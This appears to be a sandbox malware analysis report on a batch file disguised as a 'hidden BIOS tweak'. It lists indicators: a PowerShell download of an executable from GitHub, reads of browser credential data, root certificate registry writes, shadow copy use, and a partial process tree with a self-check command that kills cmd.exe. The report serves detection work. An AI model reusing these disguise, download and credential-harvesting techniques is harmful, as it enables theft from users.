cac28d2d9a9f4a13bb9a4d1ab20ef1a3800bb884a283af3e9095a00b9baf2cd5

Analysis

max time kernel
1895s
max time network
2618s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
28-04-2024 06:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RMTWEAKS_HIDDEN_BIOS_TWEAK.bat
Size

13.7MB
MD5

e344b5150dd89d3277e945c139c2ee30
SHA1

19b9fe48427c2f7a8f0c643f68f7ceff50d1ebeb
SHA256

cac28d2d9a9f4a13bb9a4d1ab20ef1a3800bb884a283af3e9095a00b9baf2cd5
SHA512

6025bd3341d907d93804035d3fc16e6d38da765ee34e68dbfab1e3032578bc8fac2b0b5a5a48518b0a446771d7521e77f7639c38e4c45d1b99eb21a5d25cf08a
SSDEEP

49152:GYmvGa3V+eLXwvjiLqAsnxYctN/vsoA05xhJPkjk/eh5Dx2IPMXDpqv8qBwZeRmq:K

Score

8^/10

spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 1440 powershell.exe
Downloads MZ/PE file

flow	pid	process
2	1440	powershell.exe

Executes dropped EXE 11 IoCs

Processes:

OperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOpera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exe

pid	process
4880	OperaGXSetup.exe
5032	OperaGXSetup.exe
2848	OperaGXSetup.exe
4692	OperaGXSetup.exe
4972	OperaGXSetup.exe
684	OperaGXSetup.exe
4988	OperaGXSetup.exe
3144	OperaGXSetup.exe
4488	Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
4132	assistant_installer.exe
916	assistant_installer.exe

Loads dropped DLL 8 IoCs

Processes:

OperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exe

pid	process
4880	OperaGXSetup.exe
5032	OperaGXSetup.exe
2848	OperaGXSetup.exe
4692	OperaGXSetup.exe
4972	OperaGXSetup.exe
684	OperaGXSetup.exe
4988	OperaGXSetup.exe
3144	OperaGXSetup.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Enumerates connected drives 3 TTPs 6 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

OperaGXSetup.exeOperaGXSetup.exeOperaGXSetup.exe

description	ioc	process
File opened (read-only)	\??\F:	OperaGXSetup.exe
File opened (read-only)	\??\D:	OperaGXSetup.exe
File opened (read-only)	\??\F:	OperaGXSetup.exe
File opened (read-only)	\??\D:	OperaGXSetup.exe
File opened (read-only)	\??\F:	OperaGXSetup.exe
File opened (read-only)	\??\D:	OperaGXSetup.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
2 raw.githubusercontent.com

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com

Drops file in Windows directory 5 IoCs

Processes:

UserOOBEBroker.exedismhost.exe

description	ioc	process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2551177587-3778486488-1329702901-1000\{F0EF6E46-E5DE-42C3-BA84-803A7574CC9A}	msedge.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

OperaGXSetup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	OperaGXSetup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	OperaGXSetup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	OperaGXSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	OperaGXSetup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	OperaGXSetup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	OperaGXSetup.exe

NTFS ADS 6 IoCs

Processes:

OperaGXSetup.exeOperaGXSetup.exemsedge.exemsedge.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe\:Zone.Identifier:$DATA	OperaGXSetup.exe
File created	C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe\:SmartScreen:$DATA	OperaGXSetup.exe
File created	C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe\:Zone.Identifier:$DATA	OperaGXSetup.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 292313.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\OperaGXSetup.exe:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\OperaGXSetup.exe\:SmartScreen:$DATA	OperaGXSetup.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exemsedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
4036	powershell.exe
4036	powershell.exe
4944	powershell.exe
4944	powershell.exe
1332	powershell.exe
1332	powershell.exe
1440	powershell.exe
1440	powershell.exe
644	powershell.exe
644	powershell.exe
4632	msedge.exe
4632	msedge.exe
4548	msedge.exe
4548	msedge.exe
1440	msedge.exe
1440	msedge.exe
2728	msedge.exe
2728	msedge.exe
2964	identity_helper.exe
2964	identity_helper.exe
2920	msedge.exe
2920	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

Processes:

msedge.exe

pid	process
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	644	powershell.exe
Token: SeBackupPrivilege	4712	vssvc.exe
Token: SeRestorePrivilege	4712	vssvc.exe
Token: SeAuditPrivilege	4712	vssvc.exe

Suspicious use of FindShellTrayWindow 40 IoCs

Processes:

msedge.exe

pid	process
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe
4632	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OperaGXSetup.exe

pid process

4880 OperaGXSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exemsedge.exe

description	pid	process	target process
PID 3808 wrote to memory of 3976	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 3976	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 2568	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 2568	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 4036	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 4036	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 4944	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 4944	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 2856	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 2856	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 1332	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 1332	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 2080	3808	cmd.exe	chcp.com
PID 3808 wrote to memory of 2080	3808	cmd.exe	chcp.com
PID 3808 wrote to memory of 3872	3808	cmd.exe	mshta.exe
PID 3808 wrote to memory of 3872	3808	cmd.exe	mshta.exe
PID 3808 wrote to memory of 2100	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 2100	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 5032	3808	cmd.exe	mshta.exe
PID 3808 wrote to memory of 5032	3808	cmd.exe	mshta.exe
PID 3808 wrote to memory of 460	3808	cmd.exe	net.exe
PID 3808 wrote to memory of 460	3808	cmd.exe	net.exe
PID 460 wrote to memory of 2200	460	net.exe	net1.exe
PID 460 wrote to memory of 2200	460	net.exe	net1.exe
PID 3808 wrote to memory of 3596	3808	cmd.exe	rundll32.exe
PID 3808 wrote to memory of 3596	3808	cmd.exe	rundll32.exe
PID 3808 wrote to memory of 1440	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 1440	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 3484	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 3484	3808	cmd.exe	findstr.exe
PID 3808 wrote to memory of 644	3808	cmd.exe	powershell.exe
PID 3808 wrote to memory of 644	3808	cmd.exe	powershell.exe
PID 4632 wrote to memory of 4292	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 4292	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe
PID 4632 wrote to memory of 3984	4632	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3808
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat"
  2⤵
  PID:3976
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat"
  2⤵
  PID:2568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\RMTWEAKS_HIDDEN_BIOS_TWEAK.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
